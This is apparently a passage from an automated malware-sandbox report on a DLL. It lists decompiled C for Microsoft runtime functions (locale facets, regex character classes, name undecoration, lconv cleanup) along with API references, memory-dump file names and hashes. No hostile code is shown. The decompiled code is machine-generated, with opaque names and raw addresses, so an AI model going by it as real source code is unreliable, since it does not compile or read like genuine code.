						E6E1952CC(_t117, _t153, _t159, _t153, _t83);
						_t85 = E6E161F29(_t117, 0x6e22174c, _t153, _t159);
						_push(_t117);
						_t160 = _t85;
						_t86 = E6E1A5C89(_t117, _t153, _t160, __eflags);
						_push(_t160);
						E6E1952CC(_t117, _t153, _t160, _t153, _t86);
						_t88 = E6E161F29(_t117, 0x6e221750, _t153, _t160);
						_push(_t117);
						_t154 = _t88;
						_t89 = E6E1A5BF4(_t117, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t89);
						_t166 = _t166 + 0x40;
					} else {
						_t91 = E6E1A9621(_t117, _t153, _t158, _t185, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t91;
						_t186 = _t91;
						if(_t91 == 0) {
							_t91 = 0;
							__eflags = 0;
						} else {
							 *(_t91 + 4) =  *(_t91 + 4) & _t117;
							 *_t91 = 0x6e1f2574;
						}
						_push(_t158);
						E6E1952CC(_t117, _t153, _t158, _t153, _t91);
						_t174 = _t166 + 0xc;
						_t161 = E6E161F29(_t117, 0x6e221748, _t153, _t158);
						_t94 = E6E1A9621(_t117, _t153, _t161, _t186, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t94;
						_t187 = _t94;
						if(_t94 == 0) {
							_t94 = 0;
							__eflags = 0;
						} else {
							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
							 *_t94 = 0x6e1f258c;
						}
						_push(_t161);
						E6E1952CC(_t117, _t153, _t161, _t153, _t94);
						_t175 = _t174 + 0xc;
						 *((intOrPtr*)(_t165 - 0x10)) = E6E161F29(_t117, 0x6e22174c, _t153, _t161);
						_t162 = E6E1A9621(_t117, _t153, _t161, _t187, 0x58);
						 *((intOrPtr*)(_t165 - 0x14)) = _t162;
						 *(_t165 - 4) = 7;
						_t188 = _t162;
						if(_t162 == 0) {
							_t162 = 0;
							__eflags = 0;
						} else {
							 *((intOrPtr*)(_t162 + 4)) = 0;
							_push(0);
							_push( *((intOrPtr*)(_t165 + 8)));
							 *(_t165 - 4) = 8;
							 *_t162 = 0x6e1f25a4;
							 *((char*)(_t162 + 0x28)) = 0;
							E6E1A7184(_t117, _t162, _t151, _t153, _t162, _t188);
							 *_t162 = 0x6e1f25d8;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						E6E1952CC(_t117, _t153, _t162, _t153, _t162);
						_t176 = _t175 + 0xc;
						 *((intOrPtr*)(_t165 - 0x10)) = E6E161F29(_t117, 0x6e221750, _t153, _t162);
						_t163 = E6E1A9621(_t117, _t153, _t162, _t188, 0x58);
						 *((intOrPtr*)(_t165 - 0x14)) = _t163;
						 *(_t165 - 4) = 0xd;
						_t189 = _t163;
						if(_t163 == 0) {
							_t154 = 0;
							__eflags = 0;
						} else {
							 *(_t163 + 4) =  *(_t163 + 4) & 0x00000000;
							_push(0);
							_push( *((intOrPtr*)(_t165 + 8)));
							 *(_t165 - 4) = 0xe;
							 *_t163 = 0x6e1f25a4;
							 *((char*)(_t163 + 0x28)) = 1;
							E6E1A7184(_t117, _t163, _t151, _t153, _t163, _t189);
							 *_t163 = 0x6e1f260c;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						E6E1952CC(_t117, _t153, _t154, _t153, _t154);
						_t166 = _t176 + 0xc;
					}
					_t66 =  *(_t165 + 0xc);
				}
				if((_t66 & 0x00000010) != 0) {
					_t155 = E6E161F29(_t117, 0x6e221754, _t153, _t154);
					_t191 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t69 = E6E1A5D1E(_t117, _t153, _t155, __eflags);
						_push(_t155);
						E6E1952CC(_t117, _t153, _t155, _t153, _t69);
						_t71 = E6E161F29(_t117, 0x6e221758, _t153, _t155);
						_push(_t117);
						_t156 = _t71;
						_t72 = E6E1A5DB3(_t117, _t153, _t156, __eflags);
						_push(_t156);
						_t66 = E6E1952CC(_t117, _t153, _t156, _t153, _t72);
					} else {
						_t73 = E6E1A9621(_t117, _t153, _t155, _t191, 0x44);
						 *((intOrPtr*)(_t165 - 0x14)) = _t73;
						 *(_t165 - 4) = 0x12;
						_t192 = _t73;
						if(_t73 == 0) {
							_t74 = 0;
							__eflags = 0;
						} else {
							_push(_t117);
							_push( *((intOrPtr*)(_t165 + 8)));
							_t74 = E6E1A5F1D(_t73, _t155);
						}
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						_push(_t155);
						E6E1952CC(_t117, _t153, _t155, _t153, _t74);
						_t118 = E6E161F29(_t117, 0x6e221758, _t153, _t155);
						_t157 = E6E1A9621(_t118, _t153, _t155, _t192, 0xc);
						 *((intOrPtr*)(_t165 - 0x14)) = _t157;
						_t193 = _t157;
						if(_t157 == 0) {
							_t157 = 0;
							__eflags = 0;
						} else {
							 *(_t157 + 4) =  *(_t157 + 4) & 0x00000000;
							 *_t157 = 0x6e1f266c;
							 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
							E6E1A7287(_t118, _t153, _t193,  *((intOrPtr*)(_t165 + 8)));
						}
						_push(_t118);
						_t66 = E6E1952CC(_t118, _t153, _t157, _t153, _t157);
					}
				}
				return E6E1A9D88(_t66);
			}

0x6e1a72b0
0x6e1a72b0
0x6e1a72b7
0x6e1a72bc
0x6e1a72be
0x6e1a72c0
0x6e1a72c5
0x6e1a72ca
0x6e1a72d4
0x6e1a72d9
0x6e1a72e0
0x6e1a72e5
0x6e1a72e7
0x6e1a7324
0x6e1a7325
0x6e1a7327
0x6e1a732c
0x6e1a732f
0x6e1a7334
0x6e1a72e9
0x6e1a72eb
0x6e1a72f3
0x6e1a72f5
0x6e1a72f9
0x6e1a72fb
0x6e1a7313
0x6e1a7313
0x6e1a72fd
0x6e1a72fd
0x6e1a7300
0x6e1a730b
0x6e1a730e
0x6e1a730e
0x6e1a7315
0x6e1a731a
0x6e1a731f
0x6e1a731f
0x6e1a72e7
0x6e1a7337
0x6e1a733c
0x6e1a7348
0x6e1a734a
0x6e1a734c
0x6e1a7377
0x6e1a7378
0x6e1a737d
0x6e1a7380
0x6e1a7385
0x6e1a734e
0x6e1a7350
0x6e1a7355
0x6e1a735b
0x6e1a7368
0x6e1a7368
0x6e1a735d
0x6e1a735d
0x6e1a7360
0x6e1a7360
0x6e1a736a
0x6e1a736d
0x6e1a7372
0x6e1a7372
0x6e1a7388
0x6e1a7388
0x6e1a738d
0x6e1a739d
0x6e1a739f
0x6e1a73a1
0x6e1a74bf
0x6e1a74c0
0x6e1a74c5
0x6e1a74c8
0x6e1a74d5
0x6e1a74da
0x6e1a74db
0x6e1a74dd
0x6e1a74e2
0x6e1a74e5
0x6e1a74f2
0x6e1a74f7
0x6e1a74f8
0x6e1a74fa
0x6e1a74ff
0x6e1a7502
0x6e1a750f
0x6e1a7514
0x6e1a7515
0x6e1a7517
0x6e1a751c
0x6e1a751f
0x6e1a7524
0x6e1a73a7
0x6e1a73a9
0x6e1a73ae
0x6e1a73b2
0x6e1a73b4
0x6e1a73c1
0x6e1a73c1
0x6e1a73b6
0x6e1a73b6
0x6e1a73b9
0x6e1a73b9
0x6e1a73c3
0x6e1a73c6
0x6e1a73cb
0x6e1a73da
0x6e1a73dc
0x6e1a73e1
0x6e1a73e5
0x6e1a73e7
0x6e1a73f5
0x6e1a73f5
0x6e1a73e9
0x6e1a73e9
0x6e1a73ed
0x6e1a73ed
0x6e1a73f7
0x6e1a73fa
0x6e1a73ff
0x6e1a740e
0x6e1a7416
0x6e1a7419
0x6e1a741c
0x6e1a7423
0x6e1a7425
0x6e1a744c
0x6e1a744c
0x6e1a7427
0x6e1a7429
0x6e1a742c
0x6e1a742d
0x6e1a7432
0x6e1a7436
0x6e1a743c
0x6e1a743f
0x6e1a7444
0x6e1a7444
0x6e1a744e
0x6e1a7451
0x6e1a7457
0x6e1a745c
0x6e1a746b
0x6e1a7473
0x6e1a7476
0x6e1a7479
0x6e1a7480
0x6e1a7482
0x6e1a74aa
0x6e1a74aa
0x6e1a7484
0x6e1a7484
0x6e1a7488
0x6e1a748a
0x6e1a748f
0x6e1a7493
0x6e1a7499
0x6e1a749d
0x6e1a74a2
0x6e1a74a2
0x6e1a74ac
0x6e1a74af
0x6e1a74b5
0x6e1a74ba
0x6e1a74ba
0x6e1a7527
0x6e1a7527
0x6e1a752c
0x6e1a753c
0x6e1a753e
0x6e1a7540
0x6e1a75bc
0x6e1a75bd
0x6e1a75c2
0x6e1a75c5
0x6e1a75d2
0x6e1a75d7
0x6e1a75d8
0x6e1a75da
0x6e1a75df
0x6e1a75e2
0x6e1a7542
0x6e1a7544
0x6e1a754a
0x6e1a754d
0x6e1a7554
0x6e1a7556
0x6e1a7565
0x6e1a7565
0x6e1a7558
0x6e1a7558
0x6e1a7559
0x6e1a755e
0x6e1a755e
0x6e1a7567
0x6e1a756b
0x6e1a756e
0x6e1a7582
0x6e1a7589
0x6e1a758b
0x6e1a758f
0x6e1a7591
0x6e1a75ad
0x6e1a75ad
0x6e1a7593
0x6e1a7593
0x6e1a759c
0x6e1a75a2
0x6e1a75a6
0x6e1a75a6
0x6e1a75af
0x6e1a75b2
0x6e1a75b7
0x6e1a7540
0x6e1a75ef

APIs

__EH_prolog3.LIBCMT ref: 6E1A72B7

Part of subcall function 6E183233: __EH_prolog3_GS.LIBCMT ref: 6E18323A

__Getcoll.LIBCPMT ref: 6E1A7306
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A731A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A732F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A736D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7380
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73C6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73FA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74B5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74C8
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74E5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7502
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A751F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7457

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E1A755E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A756E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75B2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75C5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75E2

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$H_prolog3Lockitstd::_$GetcollH_prolog3_Lockit::_Lockit::~_numpunct
String ID:
API String ID: 2403706939-0
Opcode ID: 2e2c826875bdc3ba4b280b0e13ac1eb53cf60e5606f5744a4802da6b8aba7080
Instruction ID: 84ae787f9ff0a5ff380b8b51d200b6eba5664968edfdeba59b2c63ad47966137
Opcode Fuzzy Hash: 2e2c826875bdc3ba4b280b0e13ac1eb53cf60e5606f5744a4802da6b8aba7080
Instruction Fuzzy Hash: CA91EAB5D04311ABD710DBF98851AFF7BACEF41254F11486DED18BB280DB318AD4B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E18E84C, Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E6E18E84C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t18;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr* _t44;
				signed int _t46;
				void* _t47;

				_t41 = __ecx;
				E6E1A9DBF(0x6e1eb972, __ebx, __edi, __esi, 4);
				_t44 = _t41;
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				 *_t44 = 0x6e20eb34;
				_t46 = 0;
				 *(_t47 - 4) = 0;
				 *((intOrPtr*)(_t44 + 8)) =  *((intOrPtr*)(_t47 + 0xc));
				_t18 =  *((intOrPtr*)(_t47 + 8));
				 *_t44 = 0x6e1fc860;
				_t42 =  *((intOrPtr*)(_t18 + 1));
				_t40 = (_t42 == 0x5e) + _t18 + 1;
				 *(_t44 + 0xc) = 0 | _t42 != 0x0000005e;
				if(E6E1C1260((_t42 == 0x5e) + _t18 + 1, "alnum:", 6) != 0) {
					if(E6E1C1260(_t40, "alpha:", 6) != 0) {
						if(E6E1C1260(_t40, "ascii:", 6) != 0) {
							if(E6E1C1260(_t40, "cntrl:", 6) != 0) {
								if(E6E1C1260(_t40, "digit:", 6) != 0) {
									if(E6E1C1260(_t40, "graph:", 6) != 0) {
										if(E6E1C1260(_t40, "lower:", 6) != 0) {
											if(E6E1C1260(_t40, "print:", 6) != 0) {
												if(E6E1C1260(_t40, "punct:", 6) != 0) {
													if(E6E1C1260(_t40, "space:", 6) != 0) {
														if(E6E1C1260(_t40, "upper:", 6) != 0) {
															if(E6E1C1260(_t40, "xdigit:", 7) != 0) {
																if(E6E1C1260(_t40, "blank:", 6) == 0) {
																	_t46 = 0x6e17c694;
																}
															} else {
																_t46 = 0x6e1b663f;
															}
														} else {
															_t46 = E6E1B660E;
														}
													} else {
														_t46 = E6E1B65DD;
													}
												} else {
													_t46 = 0x6e1b65ac;
												}
											} else {
												_t46 = 0x6e1b6578;
											}
										} else {
											_t46 = E6E1B6547;
										}
									} else {
										_t46 = 0x6e1b6513;
									}
								} else {
									_t46 = 0x6e1b64e2;
								}
							} else {
								_t46 = 0x6e1b64b1;
							}
						} else {
							_t46 = 0x6e1b6085;
						}
					} else {
						_t46 = 0x6e1b647d;
					}
				} else {
					_t46 = 0x6e1b6449;
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t44 + 4)) = _t46;
				return E6E1A9D88(_t44);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E18E853

Strings

punct:, xrefs: 6E18E982
ascii:, xrefs: 6E18E8CE
space:, xrefs: 6E18E99D
lower:, xrefs: 6E18E946
cntrl:, xrefs: 6E18E8EC
digit:, xrefs: 6E18E90A
upper:, xrefs: 6E18E9B8
xdigit:, xrefs: 6E18E9D3
print:, xrefs: 6E18E964
graph:, xrefs: 6E18E928
alpha:, xrefs: 6E18E8B0
blank:, xrefs: 6E18E9EE
alnum:, xrefs: 6E18E87B

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: alnum:$alpha:$ascii:$blank:$cntrl:$digit:$graph:$lower:$print:$punct:$space:$upper:$xdigit:
API String ID: 431132790-1202943499
Opcode ID: c855eec844a3a270c688f2fbfb5b2af5cf9d118828fa3982ed3f0bec409ad392
Instruction ID: e27eabd6c7dc2926a329a25b682f4f32e7485840d1621be5db99a381ecbcb5a1
Opcode Fuzzy Hash: c855eec844a3a270c688f2fbfb5b2af5cf9d118828fa3982ed3f0bec409ad392
Instruction Fuzzy Hash: D3413CD5E98305E6D22085F59C49B8775AC1B30B84F160910ED07FE3C6F366CAD4B9CA

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3CFA, Relevance: 19.8, APIs: 13, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E1B3CFA(void* __edx, signed int* _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				intOrPtr* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				void* _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x6e221b68; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x6e221b74 == 0 ||  *0x6e221b75 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E6E1AF764( &_v108,  &_v44);
							E6E1AFB8D(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E6E1AFB1E(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x6e221b68; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E6E1AFB8D(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x6e221b68 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x6e221b68 = _t71;
							_t101 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E6E1AF6E4( &_v76, 0x6e221b68, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E6E1AFB8D(E6E1AF764( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x6e221b60; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E6E1AFDD7(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if( *((char*)(_t177 + 1)) != 0x5f) {
								L31:
								_push( &_v204);
								_t122 = E6E1AFB1E(_t177,  &_v212, 0x60, L6E1B2085(_t164, _t204, _t206));
								_t207 = _t207 + 0x10;
								_t101 = E6E1AFBAF(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if( *((char*)(_t177 + 2)) != 0x3f) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x6e221b68 = _t52;
							_t125 = E6E1B2FDD(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E6E1AFB8D(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x6e221b68; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x6e221b68 =  *0x6e221b68 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x6e221b68 = _t46;
							_t135 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E6E1AFB8D(E6E1AFBAF(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x6e221b68 = _t18;
							while(1) {
								E6E1B5444(_t164, _t203, 0, _t206,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = 0;
									if(0 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E6E1AFC2F( &_v28,  &_v60);
										_t153 = E6E1AFB8D( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 =  *(_t153 + 4);
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x6e221b68; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E6E1AFB1E(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E6E1AFBAF(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E6E1B2E6D(_t177, _t203, _t204, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x6e221b68; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E6E1AFB8D(E6E1AFB6B(E6E1AF804( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E6E1AFA80(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

APIs

DName::operator+.LIBCMT ref: 6E1B3D65
DName::operator+.LIBCMT ref: 6E1B3E9B

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

DName::operator+.LIBCMT ref: 6E1B3EE7
DName::operator+.LIBCMT ref: 6E1B3EF6
DName::operator+.LIBCMT ref: 6E1B3E51

Part of subcall function 6E1B5444: DName::operator=.LIBVCRUNTIME ref: 6E1B54D3

DName::operator+.LIBCMT ref: 6E1B4023
DName::operator=.LIBVCRUNTIME ref: 6E1B4063
DName::DName.LIBVCRUNTIME ref: 6E1B407B
DName::operator+.LIBCMT ref: 6E1B408A
DName::operator+.LIBCMT ref: 6E1B4096

Part of subcall function 6E1B5444: Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: d06499ccefb6932379f15f194ead770fca35c2c8d8ce307dadbb29a45b416ad7
Instruction ID: 910f3e3792d18726a14b034b9eac4d2d3320d6b1c75b432a9f9fbceabc654f1e
Opcode Fuzzy Hash: d06499ccefb6932379f15f194ead770fca35c2c8d8ce307dadbb29a45b416ad7
Instruction Fuzzy Hash: 40C18F719042099FDB54CFE8C858BEEBBF9AB19304F10445EE25AA7280EB7199C9DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD508, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1DD508(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e218070) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E1D1BE4(_t46);
							E6E1DD825( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E1D1BE4(_t47);
							E6E1DDD12( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E1D1BE4( *((intOrPtr*)(_t74 + 0x7c)));
						E6E1D1BE4( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E1DD679( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e218258) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E1D1BE4(_t31);
							E6E1D1BE4( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E1D1BE4(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E1D1BE4(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6E1DD54C

Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD842
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD854
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD866
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD878
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD88A
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD89C
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8AE
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8C0
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8D2
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8E4
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8F6
